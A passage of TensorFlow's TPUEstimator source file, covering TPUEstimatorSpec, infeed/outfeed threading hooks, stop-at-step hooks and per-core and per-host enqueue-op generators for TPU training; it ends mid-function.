eva_server.data_received(data)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
